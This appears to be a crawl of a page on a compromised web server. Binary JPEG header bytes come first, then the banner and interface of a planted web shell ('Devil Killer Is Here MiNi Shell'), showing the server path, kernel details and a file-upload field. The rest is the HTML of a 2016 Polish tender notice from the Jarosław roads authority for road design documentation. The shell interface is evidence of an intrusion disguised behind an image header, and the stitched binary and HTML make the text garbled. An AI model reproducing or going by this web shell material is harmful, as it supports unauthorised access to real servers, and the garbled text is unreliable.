JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160607/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160607/73083-N-2016.html

<p class="kh_header"><b>Jarosław: Opracowanie dokumentacji projektowych z podziałem na zadania:</b><br>
<b>Numer ogłoszenia: 73083 - 2016; data zamieszczenia: 07.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Jarosławiu , ul. Jana Pawła II 17, 37-500 Jarosław, woj. podkarpackie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.jaroslaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowych z podziałem na zadania:.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia jest  Opracowanie dokumentacji projektowych z podziałem na zadania:
Zadanie Nr 1- Opracowanie dokumentacji projektowej na budowę chodnika wraz z kładką przy drodze powiatowej Nr 1711R Ryszkowa Wola-Laszki w m. Bobrówka w km od 3+660 do km 4+193  
Zadanie Nr 2- Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej Nr 1633R Rączyna-Rożwienica w m. Czudowice- chodnik jednostronny w km od 6+405 do km 7+385
Zadanie Nr 3-Przeprojektowanie istniejącej dokumentacji na przebudowę drogi powiatowej Nr 1674R Lubaczów-Laszki-Duńkowice w km od 13+496 do km 31+011, do wymogów Programu Rozwoju Gminnej, i Powiatowej Infrastruktury Drogowej na lata 2016-2019..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda  wniesienia wadium .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu oceny spełnienia warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w Części 10 ust.1 pkt.1 Instrukcji dla Wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zdolny do należytego wykonania udzielanego zamówienia to taki, który wykaże się wiedzą i doświadczeniem, w wykonaniu (zakończeniu),  w okresie ostatnich 3 lat przed upływem terminu składnia ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej  jeden projekt budowlano - wykonawczy  budowy lub przebudowy drogi klasy minimum Z ( w tym budowa chodnika)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu oceny spełnienia warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w Części 10 ust.1 pkt.1 Instrukcji dla Wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zdolny do należytego wykonania udzielanego zamówienia, to taki który wykaże, że będzie  
         dysponował  co najmniej jedną osoba  posiadająca uprawnienia budowlane   do projektowania   w specjalności drogowej bez ograniczeń  lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących  

        przepisów,   5 letnie doświadczenie (liczone od uzyskania uprawnień) zawodowe w projektowaniu drogowym oraz  sporządziła w tym czasie (autor lub współautor) co najmniej 1 projekt budowlano-wykonawczy budowy, rozbudowy lub przebudowy drogi klasy minimum Z.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu oceny spełnienia warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w Części 10 ust.1 pkt.1 Instrukcji dla Wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp. zgodne z treścią Formularza Nr 2 doSIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony przewidują możliwość zmiany terminu Umowy   wyłącznie z przyczyn niezależnych od Wykonawcy i mających wpływ na wykonanie przedmiotu Umowy   w następujących przypadkach:
    1) niezależnego od Stron losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie 
       zawarcia Umowy i któremu nie można było zapobiec mimo dochowania należytej staranności,
2) przedłużeniu uległy procedury administracyjne na etapie wydawania opinii, uzgodnień, postanowień i decyzji administracyjnych nie wynikające z winy Wykonawcy, pod warunkiem wyrażenia zgody przez Zamawiającego. Termin może ulec przedłużeniu o czas trwania tych okoliczności. 
     3)zmianie uległy stawki podatku VAT, 
     4) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na  
       realizację przedmiotu zamówienia lub świadczenia jednej lub obu Stron,
     5) zmian teleadresowych Stron umowy określonych w umowie, 
     6) oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy 
     7) wystąpią dodatkowe prace , których wykonanie stało się konieczne ze względu na sytuacje niemożliwą 
         wcześniej  do przewidzenia, 
     8) wydłużenia terminu zakończenia realizacji umowy, jeżeli ze względu na konieczność wykonania zamówień dodatkowych niemożliwych wcześniej do przewidzenia (realizowanych odrębną umową zgodnie z art. 67 ust. 1 pkt 5 ustawy Pzp), niemożliwe będzie dotrzymanie terminu zakończenia realizacji prac podstawowych 
      określonego w umowie,
     9) konieczności wprowadzenia zmiany terminu wykonania przedmiotu umowy wskutek zaistnienia okoliczności 
         wynikających z istotnych powodów podanych przez Wykonawcę, zaakceptowanych przez Zamawiającego.
2.Wszelkie zmiany w umowie pod rygorem nieważności muszą być dokonane w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzd.jaroslaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można pobrać ze strony internetowej www.pzd.jaroslaw.pl. , nabyć w siedzibie zamawiającego pok. 311 lub za zaliczeniem pocztowym- cena 12.00 PLN.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2016 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Jarosławiu, ul. Jana Pawła II 17, pok. nr. 313 ( Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1- Opracowanie dokumentacji projektowej na budowę chodnika wraz z kładką przy drodze powiatowej Nr 1711R Ryszkowa Wola-Laszki w m. Bobrówka w km od 3+660 do km 4+193.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szczegółowy zakres przedmiotu zamówienia ( dla każdego zadania od 1-3) obejmuje wykonanie: 
   1) Projekt  budowlany- w  5 egz. (wraz z materiałami niezbędnymi do zgłoszenia robót ( lub pozwolenia na budowę w zależności od potrzeb wynikających z projektu wraz z uzgodnieniami) oraz mapę do celów projektowych.
   2) Projekt wykonawczy -w 5 egz. dla każdej branży, w tym:
    a) cześć opisowo-obliczeniową,
    b) część rysunkowa, 
    c)  przedmiary robót - w 2 egz.
     d) ) kosztorys inwestorski    -  w 2 egz.  
     e) Specyfikacje techniczne wykonania i odbioru robót - w 2 egz.
     f) projekt  stałej organizacji ruchu zatwierdzony przez Starostę Jarosławskiego- w 2 egz.
     g)opracowania projektu stałej i czasowej organizacji ruchu (wraz z niezbędnymi urządzeniami BRD);
2.  Uzgodnienia i opinie.
      Wykonawca w ramach podjętych działań, winien: 
            1) przygotować niezbędne materiały do wystąpienia o wszelkie uzgodnienia i opinie,
            2) uzyskać wszystkie, aktualne branżowe warunki techniczne od właścicieli lub zarządców urządzeń 
                kolidujących z projektowaną inwestycją drogową,
            3) przedłożyć ww. warunki Zamawiającemu do akceptacji, 
            4) przedłożyć Zamawiającemu do zaopiniowania ustalone i uściślone zakresy kolizji urządzeń obcych z 
                 inwestycją drogową na podstawie szczegółowych warunków technicznych,
            5) uzyskać wszelkie inne decyzje, uzgodnienia i opinie niezbędne do opracowania projektu budowlanego,
            6) wykonać  wszystkie dodatkowe opracowania wynikające z uzyskanych uzgodnień, niezbędnych do 
              uzyskania akceptacji przez właściwy organ zgłoszenia robót budowlanych nie wymagających pozwolenia na 
              budowę,
            7) uzyskać akceptację przez właściwy organ zgłoszenia robót budowlanych nie wymagających pozwolenia na 
               budowę lub uzyskania właściwej ostatecznej decyzji administracyjnej umożliwiającej wykonanie przedmiotu 
               zamówienia zgodnie z obowiązującymi przepisami
3.  Decyzja o środowiskowych uwarunkowaniach ( jeżeli będzie wymagana).
Do zakresu obowiązków Wykonawcy należy:
             1) opracowanie i przygotowanie wszystkich niezbędnych załączników do wniosku o wydanie decyzji o 
                  środowiskowych uwarunkowaniach, zgodnie z obowiązującymi przepisami;
              2) opracowanie i przygotowanie zgodnie z obowiązującymi przepisami raportu o oddziaływaniu 
                   przedsięwzięcia na środowisko (w przypadku nałożenia przez właściwy organ takiego obowiązku);
4.  Pozwolenie wodno-prawne ( jeżeli będzie wymagane).
      Do zakresu obowiązków Wykonawcy należy:
       1) opracowanie i przygotowanie wszystkich niezbędnych załączników do wniosku o wydanie pozwolenia wodno-
            prawnego wraz z kompletem dokumentów, zgodnie z obowiązującymi przepisami;
5. Nadzór autorski
    Wykonawca pełnić będzie nadzór autorski według potrzeb wynikających z realizacji robót oraz na każde wezwanie Zamawiającego dokonane telefonicznie lub pisemnie na 3 dni przed wymaganym spotkaniem. Obowiązki Wykonawcy w zakresie nadzoru autorskiego obejmować będą w szczególności:
           1) Nadzór nad zgodnością wykonawstwa robót budowlanych z dokumentacją projektową, stwierdzanie w toku wykonywania robót budowlanych zgodności ich realizacji z dokumentacją projektową, decyzją o pozwoleniu na budowę/decyzją o zezwoleniu na realizację inwestycji drogowej oraz zasadami wiedzy technicznej,
           2) Niezwłoczne informowanie Zamawiającego i Wykonawcy robót budowlanych o wszelkich dostrzeżonych błędach w realizacji inwestycji, a w szczególności o powstałych w trakcie budowy rozbieżnościach z dokumentacją projektową,
    3) Wyjaśnianie wątpliwości powstałych w toku realizacji robót budowlanych, dotyczących dokumentacji projektowej i zawartych w niej rozwiązań technicznych poprzez dodatkowe informacje i opracowania oraz ewentualne uszczegóławianie dokumentacji projektowej, uzupełnianie rysunków, detali bądź opisu technologii wykonania nie zawartych w dokumentacji projektowej,
   4) Poprawianie błędnych rozwiązań projektowych w ramach przedmiotowej umowy i oferty, 
   5) Nanoszenie poprawek lub uzupełnień na wszystkich egzemplarzach projektu w ramach przedmiotowej umowy i 
       oferty,
   6) Uzgadnianie z Zamawiającym możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych 
       w dokumentacji projektowej,
   7) Przedstawianie propozycji rozwiązań zamiennych w przypadku niemożności zastosowania rozwiązań występujących w dokumentacji projektowej lub gdy ich zastosowanie jest nieekonomiczne lub nieefektywne w świetle aktualnej wiedzy technicznej i zasad sztuki budowlanej, a koszt zastosowania nowych rozwiązań nie zwiększy kosztów zadania z zastrzeżeniem, że każde z rozwiązań musi być uprzednio zatwierdzone przez Zamawiającego,
     8) Czuwanie, by zakres wprowadzonych zmian nie spowodował istotnej zmiany w stosunku do zatwierdzonego projektu budowlanego, a w przypadku konieczności wprowadzenia zmian istotnych przygotowanie dokumentacji zamiennej w zakresie i formie umożliwiającej uzyskanie zamiennej decyzji o pozwoleniu na budowę/decyzji o zezwoleniu na realizację inwestycji drogowej,
     9) Udział, na każde wezwanie Zamawiającego, w komisjach, naradach technicznych, odbiorach robót 
        związanych z realizacją przedmiotowego projektu,
    10)Zapewnienie udziału przedstawicieli poszczególnych branż w sprawowaniu nadzoru autorskiego,
6. Wymogi formalno-prawne
 1) Poszczególne elementy dokumentacji projektowej  powinny być sprawdzone przez osobę  posiadającą  uprawnienia drogowe, 
    2 ) Oświadczenie projektanta i sprawdzającego, że opracowanie zostało wykonane zgodnie z umową, obowiązującymi przepisami i jest kompletne z punktu widzenia celu, któremu ma służyć oraz, że zostało sprawdzone (uwaga: dokumentacja projektowa ma spełniać wymogi określone w przepisach prawnych, normach, normatywach, katalogach, wytycznych i innych, niezbędnych przy realizacji zamówienia, obowiązujących w dniu przekazania dokumentacji Zamawiającemu )
   3) Projektant odpowiada za wady dokumentacji projektowej do czasu odbioru pogwarancyjnego    wybudowanego obiektu. Ujawnione wady Jednostka Projektująca zobowiązana jest usunąć w terminie określonym przez   Zamawiającego. Poprawki winny być naniesione w każdym egzemplarzu projektu budowlanego i wykonawczego jak również w nośnikach czytelnych dla urządzeń elektronicznego przetwarzania danych w okresie 3 lat .
  4)Ewentualne dodatkowe koszty budowy  wynikające z błędów projektowych, błędów     w przedmiarze robót lub wynikłe z braku odpowiednich pozycji przedmiaru pokrywa Projektant.
7. Oprócz wersji papierowej dokumentacja projektowa musi być zapisana w formie elektronicznej 
   ( edytowalnej) na nośniku CD/DVD ( w 1 egz), która winna być zaopatrzona w spis określający szczegółową zawartość (nazwa projektu, nazwa załącznika i nazwa pliku, w którym został zapisany). Wszystkie materiały 
   tekstowe takie jak    opisy techniczne, obliczenia, itp. muszą być zapisać w formatach  MS Word, AutoCAD i PDF,  przedmiary  i     kosztorysy  w  programie  kosztorysowym ( np. NORMA)   oraz PDF.  , części rysunkowe   w formacie  PDF i AutoCAD , a mapa do celów projektowych w formacie dwg lub dxf .
8. Wymagania dotyczące opracowania dokumentacji: 
1) Dokumentacja powinna posiadać wszelkie, wymagane obowiązującymi przepisami prawa uzgodnienia i opinie. 
2) Wykonawca przekaże Zamawiającemu kompletną  dokumentację, zgodne z umową obejmującą przedmiot zamówienia w siedzibie Zamawiającego .
3) Wykonawca opatrzy ww. opracowanie w wykaz zawartości dokumentacji oraz pisemne oświadczenie, że dostarczona dokumentacja jest wykonana zgodnie z postanowieniami umowy, zasadami współczesnej wiedzy technicznej oraz obowiązującymi przepisami i jest kompletna z punktu widzenia celu, któremu ma służyć.
4) Wykaz opracowań i pisemne oświadczenie, o których mowa powyżej stanowią integralną część przedmiotowego opracowania.
5) Zamawiający po otrzymaniu dokumentacji przystąpi do czynności odbioru, który zakończy się podpisaniem protokołu zdawczo-odbiorczego . W przypadku wystąpienia wad  w opracowaniu przedmiotu zamówienia  , Zamawiający zwróci Wykonawcy  opracowaną dokumentację z podaniem na piśmie przyczyn odmowy odbioru.
6) Rozliczenie wynagrodzenia za wykonaną usługę nastąpi na podstawie faktury końcowej wystawionej w oparciu o protokół odbioru przedmiotu wykonanego bez wad.
9. Wymagania dodatkowe: 
1) Wykonawca jest zobowiązany uzyskać wszelkie wymagane decyzje, pozwolenia, uzgodnienia i opinie niezbędne do zrealizowania inwestycji. Wszelkie opłaty i koszty związane z ich uzyskaniem ponosi Wykonawca.  
 2) Forma i treść opracowywanych wniosków o wydanie decyzji administracyjnych, pozwoleń, uzgodnień, opinii oraz forma, treść i liczba egzemplarzy materiałów będących załącznikami do wniosków o ich wydanie, muszą być zgodne z obowiązującymi wymaganiami organów, w dniu ich złożenia. 
3) Zamawiający zastrzega sobie prawo do uzyskiwania od Wykonawcy informacji o postępie prac i przyjętych rozwiązaniach w trakcie projektowania, jak również do składania swoich uwag, które Wykonawca uwzględni w dalszych pracach nad dokumentacją. 
4) Dokumentacja projektowa zostanie wykorzystana do przeprowadzenia postępowania o udzielenie zamówienia publicznego na roboty budowlane, w związku z powyższym jej treść nie może zawierać oznaczeń, znaków towarowych, patentów lub pochodzenia. W przypadku braku możliwości opisania treści dokumentacji za pomocą dostatecznie dokładnych określeń, dopuszcza się wskazanie znaku towarowego, patentu lub pochodzenia, nakładając obowiązek umieszczenia wyrazów lub równoważny oraz określenie zakresu równoważności
